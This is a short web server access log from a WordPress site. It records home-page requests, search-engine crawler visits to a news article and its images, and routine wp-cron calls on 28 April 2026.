119.84.246.117 - - [28/Apr/2026:22:18:29 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11"
119.84.246.117 - - [28/Apr/2026:22:18:30 +0800] "GET / HTTP/1.1" 200 158581 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11"
119.84.246.117 - - [28/Apr/2026:22:18:31 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1"
119.84.246.117 - - [28/Apr/2026:22:18:31 +0800] "GET / HTTP/1.1" 200 158581 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1"
119.84.246.117 - - [28/Apr/2026:22:18:32 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1"
119.84.246.117 - - [28/Apr/2026:22:18:32 +0800] "GET / HTTP/1.1" 200 158581 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1"
36.133.115.36 - - [28/Apr/2026:22:28:51 +0800] "POST /wp-cron.php?doing_wp_cron=1777386531.5882949829101562500000 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
129.212.236.248 - - [28/Apr/2026:22:28:51 +0800] "GET / HTTP/1.1" 200 156922 "-" "-"
121.41.171.40 - - [28/Apr/2026:22:28:56 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36"
36.133.115.36 - - [28/Apr/2026:22:37:14 +0800] "POST /wp-cron.php?doing_wp_cron=1777387034.1184329986572265625000 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
110.249.202.218 - - [28/Apr/2026:22:37:14 +0800] "GET /robots.txt HTTP/1.1" 200 190 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)"
36.133.115.36 - - [28/Apr/2026:23:09:05 +0800] "POST /wp-cron.php?doing_wp_cron=1777388945.1433351039886474609375 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
167.172.246.108 - - [28/Apr/2026:23:09:05 +0800] "GET / HTTP/1.1" 200 156922 "-" "-"
220.181.108.157 - - [28/Apr/2026:23:19:13 +0800] "GET /news/2388 HTTP/1.1" 200 24505 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
116.179.37.236 - - [28/Apr/2026:23:21:02 +0800] "GET /wp-content/uploads/2025/12/1766647829-Article_images_202512251.webp HTTP/1.1" 200 53246 "http://cqqizhou.com/news/2388" "Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)"
116.179.37.10 - - [28/Apr/2026:23:21:02 +0800] "GET /wp-content/uploads/2025/12/1766647830-Article_images_202512252.webp HTTP/1.1" 200 84832 "http://cqqizhou.com/news/2388" "Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)"
116.179.37.16 - - [28/Apr/2026:23:21:05 +0800] "GET /wp-content/uploads/2025/12/1766647831-Article_images_202512253.webp HTTP/1.1" 200 115480 "http://cqqizhou.com/news/2388" "Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)"
36.133.115.36 - - [28/Apr/2026:23:48:47 +0800] "POST /wp-cron.php?doing_wp_cron=1777391327.3710379600524902343750 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
139.59.254.1 - - [28/Apr/2026:23:48:47 +0800] "GET / HTTP/1.1" 200 156922 "-" "-"